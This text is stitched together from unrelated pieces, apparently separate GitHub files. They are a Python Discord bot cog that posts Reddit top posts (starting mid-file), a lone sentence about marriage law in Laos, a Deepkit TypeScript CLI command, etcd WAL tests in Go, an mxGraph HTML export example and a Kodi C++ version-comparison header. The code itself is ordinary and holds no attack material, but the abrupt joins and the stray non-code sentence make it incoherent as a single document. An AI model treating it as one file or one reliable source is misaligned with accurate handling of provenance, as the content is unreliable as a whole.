    def cog_unload(self) -> None:
        """Stop the loop task and revoke the access token when the cog is unloaded."""
        self.auto_poster_loop.cancel()
        if self.access_token and self.access_token.expires_at > datetime.utcnow():
            asyncio.create_task(self.revoke_access_token())

    async def init_reddit_ready(self) -> None:
        """Sets the reddit webhook when the cog is loaded."""
        await self.bot.wait_until_guild_available()
        if not self.webhook:
            self.webhook = await self.bot.fetch_webhook(Webhooks.reddit)

    @property
    def channel(self) -> TextChannel:
        """Get the #reddit channel object from the bot's cache."""
        return self.bot.get_channel(Channels.reddit)

    async def get_access_token(self) -> None:
        """
        Get a Reddit API OAuth2 access token and assign it to self.access_token.

        A token is valid for 1 hour. There will be MAX_RETRIES to get a token, after which the cog
        will be unloaded and a ClientError raised if retrieval was still unsuccessful.
        """
        for i in range(1, self.MAX_RETRIES + 1):
            response = await self.bot.http_session.post(
                url=f"{self.URL}/api/v1/access_token",
                headers=self.HEADERS,
                auth=self.client_auth,
                data={
                    "grant_type": "client_credentials",
                    "duration": "temporary"
                }
            )

            if response.status == 200 and response.content_type == "application/json":
                content = await response.json()
                expiration = int(content["expires_in"]) - 60  # Subtract 1 minute for leeway.
                self.access_token = AccessToken(
                    token=content["access_token"],
                    expires_at=datetime.utcnow() + timedelta(seconds=expiration)
                )

                log.debug(f"New token acquired; expires on UTC {self.access_token.expires_at}")
                return
            else:
                log.debug(
                    f"Failed to get an access token: "
                    f"status {response.status} & content type {response.content_type}; "
                    f"retrying ({i}/{self.MAX_RETRIES})"
                )

            await asyncio.sleep(3)

        self.bot.remove_cog(self.qualified_name)
        raise ClientError("Authentication with the Reddit API failed. Unloading the cog.")

    async def revoke_access_token(self) -> None:
        """
        Revoke the OAuth2 access token for the Reddit API.

        For security reasons, it's good practice to revoke the token when it's no longer being used.
        """
        response = await self.bot.http_session.post(
            url=f"{self.URL}/api/v1/revoke_token",
            headers=self.HEADERS,
            auth=self.client_auth,
            data={
                "token": self.access_token.token,
                "token_type_hint": "access_token"
            }
        )

        if response.status == 204 and response.content_type == "application/json":
            self.access_token = None
        else:
            log.warning(f"Unable to revoke access token: status {response.status}.")

    async def fetch_posts(self, route: str, *, amount: int = 25, params: dict = None) -> List[dict]:
        """A helper method to fetch a certain amount of Reddit posts at a given route."""
        # Reddit's JSON responses only provide 25 posts at most.
        if not 25 >= amount > 0:
            raise ValueError("Invalid amount of subreddit posts requested.")

        # Renew the token if necessary.
        if not self.access_token or self.access_token.expires_at < datetime.utcnow():
            await self.get_access_token()

        url = f"{self.OAUTH_URL}/{route}"
        for _ in range(self.MAX_RETRIES):
            response = await self.bot.http_session.get(
                url=url,
                headers={**self.HEADERS, "Authorization": f"bearer {self.access_token.token}"},
                params=params
            )
            if response.status == 200 and response.content_type == 'application/json':
                # Got appropriate response - process and return.
                content = await response.json()
                posts = content["data"]["children"]
                return posts[:amount]

            await asyncio.sleep(3)

        log.debug(f"Invalid response from: {url} - status code {response.status}, mimetype {response.content_type}")
        return []  # Failed to get appropriate response within allowed number of retries.

    async def get_top_posts(self, subreddit: Subreddit, time: str = "all", amount: int = 5) -> Embed:
        """
        Get the top amount of posts for a given subreddit within a specified timeframe.

        A time of "all" will get posts from all time, "day" will get top daily posts and "week" will
        get the top weekly posts.

        The amount should be between 0 and 25 as Reddit's JSON requests only provide 25 posts at most.
        """
        embed = Embed(description="")

        posts = await self.fetch_posts(
            route=f"{subreddit}/top",
            amount=amount,
            params={"t": time}
        )

        if not posts:
            embed.title = random.choice(ERROR_REPLIES)
            embed.colour = Colour.red()
            embed.description = (
                "Sorry! We couldn't find any posts from that subreddit. "
                "If this problem persists, please let us know."
            )

            return embed

        for post in posts:
            data = post["data"]

            text = data["selftext"]
            if text:
                text = textwrap.shorten(text, width=128, placeholder="...")
                text += "\n"  # Add newline to separate embed info

            ups = data["ups"]
            comments = data["num_comments"]
            author = data["author"]

            title = textwrap.shorten(data["title"], width=64, placeholder="...")
            # Normal brackets interfere with Markdown.
            title = escape_markdown(title).replace("[", "⦋").replace("]", "⦌")
            link = self.URL + data["permalink"]

            embed.description += (
                f"**[{title}]({link})**\n"
                f"{text}"
                f"{Emojis.upvotes} {ups} {Emojis.comments} {comments} {Emojis.user} {author}\n\n"
            )

        embed.colour = Colour.blurple()
        return embed

    @loop()
    async def auto_poster_loop(self) -> None:
        """Post the top 5 posts daily, and the top 5 posts weekly."""
        # once we upgrade to d.py 1.3 this can be removed and the loop can use the `time=datetime.time.min` parameter
        now = datetime.utcnow()
        tomorrow = now + timedelta(days=1)
        midnight_tomorrow = tomorrow.replace(hour=0, minute=0, second=0)
        seconds_until = (midnight_tomorrow - now).total_seconds()

        await asyncio.sleep(seconds_until)

        await self.bot.wait_until_guild_available()
        if not self.webhook:
            # Fix: the fetched webhook was previously discarded, leaving
            # self.webhook None and crashing the send calls below.
            self.webhook = await self.bot.fetch_webhook(Webhooks.reddit)

        if datetime.utcnow().weekday() == 0:
            await self.top_weekly_posts()
            # if it's a monday send the top weekly posts

        for subreddit in RedditConfig.subreddits:
            top_posts = await self.get_top_posts(subreddit=subreddit, time="day")
            username = sub_clyde(f"{subreddit} Top Daily Posts")
            message = await self.webhook.send(username=username, embed=top_posts, wait=True)

            if message.channel.is_news():
                await message.publish()

    async def top_weekly_posts(self) -> None:
        """Post a summary of the top posts."""
        for subreddit in RedditConfig.subreddits:
            # Send and pin the new weekly posts.
            top_posts = await self.get_top_posts(subreddit=subreddit, time="week")
            username = sub_clyde(f"{subreddit} Top Weekly Posts")
            message = await self.webhook.send(wait=True, username=username, embed=top_posts)

            if subreddit.lower() == "r/python":
                if not self.channel:
                    log.warning("Failed to get #reddit channel to remove pins in the weekly loop.")
                    return

                # Remove the oldest pins so that only 12 remain at most.
                pins = await self.channel.pins()

                while len(pins) >= 12:
                    await pins[-1].unpin()
                    del pins[-1]

                await message.pin()

                if message.channel.is_news():
                    await message.publish()

    @group(name="reddit", invoke_without_command=True)
    async def reddit_group(self, ctx: Context) -> None:
        """View the top posts from various subreddits."""
        await ctx.send_help(ctx.command)

    @reddit_group.command(name="top")
    async def top_command(self, ctx: Context, subreddit: Subreddit = "r/Python") -> None:
        """Send the top posts of all time from a given subreddit."""
        async with ctx.typing():
            embed = await self.get_top_posts(subreddit=subreddit, time="all")

        await ctx.send(content=f"Here are the top {subreddit} posts of all time!", embed=embed)

    @reddit_group.command(name="daily")
    async def daily_command(self, ctx: Context, subreddit: Subreddit = "r/Python") -> None:
        """Send the top posts of today from a given subreddit."""
        async with ctx.typing():
            embed = await self.get_top_posts(subreddit=subreddit, time="day")

        await ctx.send(content=f"Here are today's top {subreddit} posts!", embed=embed)

    @reddit_group.command(name="weekly")
    async def weekly_command(self, ctx: Context, subreddit: Subreddit = "r/Python") -> None:
        """Send the top posts of this week from a given subreddit."""
        async with ctx.typing():
            embed = await self.get_top_posts(subreddit=subreddit, time="week")

        await ctx.send(content=f"Here are this week's top {subreddit} posts!", embed=embed)

    @has_any_role(*STAFF_ROLES)
    @reddit_group.command(name="subreddits", aliases=("subs",))
    async def subreddits_command(self, ctx: Context) -> None:
        """Send a paginated embed of all the subreddits we're relaying."""
        embed = Embed()
        embed.title = "Relayed subreddits."
        embed.colour = Colour.blurple()

        await LinePaginator.paginate(
            RedditConfig.subreddits,
            ctx, embed,
            footer_text="Use the reddit commands along with these to view their posts.",
            empty=False,
            max_lines=15
        )


def setup(bot: Bot) -> None:
    """Load the Reddit cog."""
    if not RedditConfig.secret or not RedditConfig.client_id:
        log.error("Credentials not provided, cog not loaded.")
        return
    bot.add_cog(Reddit(bot))
It’s not possible for two foreigners to get married in Laos. One of you must be a Lao national. Contact the [Embassy of Laos](/government/publications/foreign-embassies-in-the-uk) to find out about local marriage laws.
{ "pile_set_name": "Github" }
/*
 * Copyright (c) Marc J. Schmidt <[email protected]>
 * This file is part of Deepkit and licensed under GNU GPL v3. See the LICENSE file for more information.
 */

import {Command} from '@oclif/command';
import 'reflect-metadata';
import {getCWD, getFolderLinksOfDirectory, getHomeConfig} from "@deepkit/core-node";
import {AppControllerInterface, createUserSocketClient} from "@deepkit/core";
import chalk from "chalk";

export class IdCommand extends Command {
    static description = 'Shows information about configured accounts, authentication, and linked projects.';

    public static flags = {};

    /**
     * For every account in the home config: connect, report the authenticated
     * user and organisation memberships (or the connection error), then list
     * the project links of the current working directory. Always terminates
     * the process with exit code 0.
     */
    public async run(): Promise<void> {
        const {args, flags} = this.parse(IdCommand);

        const home = await getHomeConfig();

        for (const account of home.accounts) {
            const client = await createUserSocketClient(account);
            const app = client.controller<AppControllerInterface>('app');

            try {
                const user = await app.getAuthenticatedUser();
                console.log(`Account ${chalk.green(account.name)} ${chalk.gray(account.host)}: authenticated as ${chalk.yellow(user.value.username)} <${user.value.email}>`);
                const orgas = await app.getMyOrganisations();
                for (const org of orgas.all()) {
                    console.log(`   Member of organisation ${chalk.yellow(org.username)}.`);
                }
            } catch (error) {
                console.error(`Account ${chalk.red(account.name)} ${chalk.gray(account.host)} not reachable: ${chalk.yellow(error.message)}`);
            } finally {
                // Always drop the socket so the process can exit cleanly.
                client.disconnect();
            }
        }

        console.log(`Linked projects:`);
        const links = await getFolderLinksOfDirectory(getCWD());
        if (links.length) {
            for (const link of links) {
                const account = home.getAccount(link.accountId);
                console.log(`   Project ${chalk.green(link.name)} via account ${chalk.green(account.name)} in folder ${chalk.yellow(link.path)}`);
            }
        } else {
            console.log(`   No links for ${getCWD()}`);
        }

        process.exit(0);
    }
}
{ "pile_set_name": "Github" }
// Copyright 2015 The etcd Authors
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
//     http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.

package wal

import (
	"bytes"
	"hash/crc32"
	"io"
	"io/ioutil"
	"reflect"
	"testing"

	"github.com/coreos/etcd/wal/walpb"
)

var (
	// infoData is the raw payload of a sample record.
	infoData = []byte("\b\xef\xfd\x02")
	// infoRecord is a complete serialized record framing infoData:
	// fixed-width length prefix followed by the marshaled walpb.Record
	// (assumed layout — matches the `infoRecord[:8]` / `-8` slicing below;
	// confirm against the encoder).
	infoRecord = append([]byte("\x0e\x00\x00\x00\x00\x00\x00\x00\b\x01\x10\x99\xb5\xe4\xd0\x03\x1a\x04"), infoData...)
)

// TestReadRecord table-drives the decoder over one valid record, several
// truncations of it (expected to fail with EOF/ErrUnexpectedEOF), and a
// record whose last payload byte was corrupted (expected CRC mismatch).
func TestReadRecord(t *testing.T) {
	// Corrupt the final data byte to trigger a CRC mismatch.
	badInfoRecord := make([]byte, len(infoRecord))
	copy(badInfoRecord, infoRecord)
	badInfoRecord[len(badInfoRecord)-1] = 'a'

	tests := []struct {
		data []byte        // raw bytes fed to the decoder
		wr   *walpb.Record // expected decoded record
		we   error         // expected error
	}{
		// Fully valid record decodes with matching type, CRC and data.
		{infoRecord, &walpb.Record{Type: 1, Crc: crc32.Checksum(infoData, crcTable), Data: infoData}, nil},
		// Empty input: clean EOF.
		{[]byte(""), &walpb.Record{}, io.EOF},
		// Various truncation points: all must report an unexpected EOF.
		{infoRecord[:8], &walpb.Record{}, io.ErrUnexpectedEOF},
		{infoRecord[:len(infoRecord)-len(infoData)-8], &walpb.Record{}, io.ErrUnexpectedEOF},
		{infoRecord[:len(infoRecord)-len(infoData)], &walpb.Record{}, io.ErrUnexpectedEOF},
		{infoRecord[:len(infoRecord)-8], &walpb.Record{}, io.ErrUnexpectedEOF},
		// Corrupted payload byte: CRC check must fail.
		{badInfoRecord, &walpb.Record{}, walpb.ErrCRCMismatch},
	}

	rec := &walpb.Record{}
	for i, tt := range tests {
		buf := bytes.NewBuffer(tt.data)
		decoder := newDecoder(ioutil.NopCloser(buf))
		e := decoder.decode(rec)
		if !reflect.DeepEqual(rec, tt.wr) {
			t.Errorf("#%d: block = %v, want %v", i, rec, tt.wr)
		}
		if !reflect.DeepEqual(e, tt.we) {
			t.Errorf("#%d: err = %v, want %v", i, e, tt.we)
		}
		// Fresh record for the next case; decode may have partially filled it.
		rec = &walpb.Record{}
	}
}

// TestWriteRecord round-trips a record through the encoder and decoder and
// checks that type and data survive unchanged.
func TestWriteRecord(t *testing.T) {
	b := &walpb.Record{}
	typ := int64(0xABCD)
	d := []byte("Hello world!")
	buf := new(bytes.Buffer)
	e := newEncoder(buf, 0, 0)
	e.encode(&walpb.Record{Type: typ, Data: d})
	// Flush so the decoder below sees the complete serialized bytes.
	e.flush()
	decoder := newDecoder(ioutil.NopCloser(buf))
	err := decoder.decode(b)
	if err != nil {
		t.Errorf("err = %v, want nil", err)
	}
	if b.Type != typ {
		t.Errorf("type = %d, want %d", b.Type, typ)
	}
	if !reflect.DeepEqual(b.Data, d) {
		t.Errorf("data = %v, want %v", b.Data, d)
	}
}
{ "pile_set_name": "Github" }
<!--
  $Id: Export.htm,v 1.1 2014/01/03 12:30:29 gaudenz Exp $
  Copyright (c) 2006-2013, JGraph Ltd
-->
<html>
<head>
	<title>Export example for mxGraph</title>

	<!-- Sets the basepath for the library if not in same directory -->
	<script type="text/javascript">
		mxBasePath = '/mxgraph/javascript/src';
	</script>

	<!-- Loads and initializes the library -->
	<script type="text/javascript" src="/mxgraph/javascript/src/js/mxClient.js"></script>

	<!-- Example code -->
	<script type="text/javascript">
		// Program starts here. Creates a sample graph in the
		// DOM node with the specified ID. This function is invoked
		// from the onLoad event handler of the document (see below).
		function main(container)
		{
			// Checks if the browser is supported
			if (!mxClient.isBrowserSupported())
			{
				// Displays an error message if the browser is not supported.
				mxUtils.error('Browser is not supported!', 200, false);
			}
			else
			{
				// Disables the built-in context menu
				mxEvent.disableContextMenu(container);

				// Creates the graph inside the given container
				var graph = new mxGraph(container);

				// Enables rubberband selection
				new mxRubberband(graph);

				// Gets the default parent for inserting new cells. This
				// is normally the first child of the root (ie. layer 0).
				var parent = graph.getDefaultParent();

				// Adds cells to the model in a single step
				graph.getModel().beginUpdate();
				try
				{
					var v1 = graph.insertVertex(parent, null, 'Hello,', 20, 20, 80, 30);
					var v2 = graph.insertVertex(parent, null, 'World!', 200, 150, 80, 30);
					var e1 = graph.insertEdge(parent, null, '', v1, v2);
				}
				finally
				{
					// Updates the display
					graph.getModel().endUpdate();
				}

				// Exporting to SVG using EchoServlet: renders the graph into a
				// standalone SVG document and posts it to /Echo.ashx, which is
				// presumed to echo the payload back as a download — confirm
				// against the server side.
				document.body.appendChild(mxUtils.button('Export SVG', function ()
				{
					var background = '#ffffff';
					var scale = 1;
					var border = 1;

					var imgExport = new mxImageExport();
					var bounds = graph.getGraphBounds();
					var vs = graph.view.scale;

					// Prepares SVG document that holds the output
					var svgDoc = mxUtils.createXmlDocument();
					// createElementNS is missing on some legacy DOM
					// implementations; fall back to createElement there.
					var root = (svgDoc.createElementNS != null) ?
						svgDoc.createElementNS(mxConstants.NS_SVG, 'svg') : svgDoc.createElement('svg');

					if (background != null)
					{
						if (root.style != null)
						{
							root.style.backgroundColor = background;
						}
						else
						{
							root.setAttribute('style', 'background-color:' + background);
						}
					}

					if (svgDoc.createElementNS == null)
					{
						root.setAttribute('xmlns', mxConstants.NS_SVG);
					}
					else
					{
						// KNOWN: Ignored in IE9-11, adds namespace for each image element instead. No workaround.
						root.setAttributeNS('http://www.w3.org/2000/xmlns/', 'xmlns:xlink', mxConstants.NS_XLINK);
					}

					// Output size: graph bounds rescaled from the current view
					// scale to the export scale, plus a border on each side.
					root.setAttribute('width', (Math.ceil(bounds.width * scale / vs) + 2 * border) + 'px');
					root.setAttribute('height', (Math.ceil(bounds.height * scale / vs) + 2 * border) + 'px');
					root.setAttribute('version', '1.1');

					// Adds group for anti-aliasing via transform
					var group = (svgDoc.createElementNS != null) ?
						svgDoc.createElementNS(mxConstants.NS_SVG, 'g') : svgDoc.createElement('g');
					group.setAttribute('transform', 'translate(0.5,0.5)');
					root.appendChild(group);
					svgDoc.appendChild(root);

					// Renders graph. Offset will be multiplied with state's scale when painting state.
					var svgCanvas = new mxSvgCanvas2D(group);
					svgCanvas.translate(Math.floor((border / scale - bounds.x) / vs), Math.floor((border / scale - bounds.y) / vs));
					svgCanvas.scale(scale / vs);
					imgExport.drawState(graph.getView().getState(graph.model.root), svgCanvas);

					var xml = encodeURIComponent(mxUtils.getXml(root));
					new mxXmlRequest('/Echo.ashx', 'filename=export.svg&format=svg' + '&xml=' + xml).simulate(document, '_blank');
				}));

				// Renders the graph into an intermediate XML canvas and posts
				// it to /Export.ashx for server-side rasterization in the
				// given format (e.g. 'png').
				function exportFile(format)
				{
					var bg = '#ffffff';
					var scale = 1;
					var b = 1;

					var imgExport = new mxImageExport();
					var bounds = graph.getGraphBounds();
					var vs = graph.view.scale;

					// New image export
					var xmlDoc = mxUtils.createXmlDocument();
					var root = xmlDoc.createElement('output');
					xmlDoc.appendChild(root);

					// Renders graph. Offset will be multiplied with state's scale when painting state.
					var xmlCanvas = new mxXmlCanvas2D(root);
					xmlCanvas.translate(Math.floor((b / scale - bounds.x) / vs), Math.floor((b / scale - bounds.y) / vs));
					xmlCanvas.scale(scale / vs);
					imgExport.drawState(graph.getView().getState(graph.model.root), xmlCanvas);

					// Puts request data together
					var w = Math.ceil(bounds.width * scale / vs + 2 * b);
					var h = Math.ceil(bounds.height * scale / vs + 2 * b);
					var xml = mxUtils.getXml(root);

					// bg is initialized above, so this branch always runs; kept
					// as-is so a null background simply omits the parameter.
					if (bg != null)
					{
						bg = '&bg=' + bg;
					}

					new mxXmlRequest('/Export.ashx', 'filename=export.' + format + '&format=' + format + bg +
						'&w=' + w + '&h=' + h + '&xml=' + encodeURIComponent(xml)).
						simulate(document, '_blank');
				}

				// Exporting to bitmap using ExportServlet
				document.body.appendChild(mxUtils.button('Export PNG', function ()
				{
					exportFile('png');
				}));
			}
		};
	</script>
</head>

<!-- Page passes the container for the graph to the program -->
<body onload="main(document.getElementById('graphContainer'))">

	<!-- Creates a container for the graph with a grid wallpaper -->
	<div id="graphContainer"
		style="position:relative;overflow:hidden;width:321px;height:241px;border:1px solid gray;cursor:default;">
	</div>
</body>
</html>
{ "pile_set_name": "Github" }
/*
 *  Copyright (C) 2005-2018 Team Kodi
 *  This file is part of Kodi - https://kodi.tv
 *
 *  SPDX-License-Identifier: GPL-2.0-or-later
 *  See LICENSES/README.md for more information.
 */

#pragma once

#include <string>

namespace ADDON
{
  /* \brief Addon versioning using the debian versioning scheme

     AddonVersion uses debian versioning, which means in the each section of the period
     separated version string, numbers are compared numerically rather than
     lexicographically, thus any preceding zeros are ignored.

     i.e. 1.00 is considered the same as 1.0, and 1.01 is considered the same as 1.1.

     Further, 1.0 < 1.0.0

     See here for more info: http://www.debian.org/doc/debian-policy/ch-controlfields.html#s-f-Version
   */
  class AddonVersion
  {
  public:
    // Defaulted copy construction copies each member directly. The previous
    // user-provided body (`*this = other`) default-initialized the members
    // first — leaving the int mEpoch indeterminate — and then assigned over
    // them; observable behavior is identical, but this is the idiomatic form
    // and matches the already-defaulted assignment and destructor.
    AddonVersion(const AddonVersion& other) = default;
    explicit AddonVersion(const std::string& version);
    explicit AddonVersion(const char* version = nullptr);
    virtual ~AddonVersion() = default;

    // Debian-style epoch component of the version (the part compared first).
    int Epoch() const { return mEpoch; }
    // Upstream version component.
    const std::string& Upstream() const { return mUpstream; }
    // Packaging revision component.
    const std::string& Revision() const { return mRevision; }

    AddonVersion& operator=(const AddonVersion& other);

    // Comparisons follow the debian ordering rules described above.
    bool operator<(const AddonVersion& other) const;
    bool operator>(const AddonVersion& other) const;
    bool operator<=(const AddonVersion& other) const;
    bool operator>=(const AddonVersion& other) const;
    bool operator==(const AddonVersion& other) const;
    bool operator!=(const AddonVersion& other) const;

    // Serializes the version back to its string form.
    std::string asString() const;
    // True when this version carries no value.
    bool empty() const;

    // Splits an addon file name into its ID and version parts; returns
    // whether the split succeeded. (Exact file-name format is defined by the
    // out-of-line implementation — confirm there.)
    static bool SplitFileName(std::string& ID, std::string& version, const std::string& filename);

  protected:
    int mEpoch;
    std::string mUpstream;
    std::string mRevision;

    // Compares one dot-separated component per the debian rules
    // (numeric runs compared numerically).
    static int CompareComponent(const char* a, const char* b);
  };

  inline AddonVersion& AddonVersion::operator=(const AddonVersion& other) = default;
}
{ "pile_set_name": "Github" }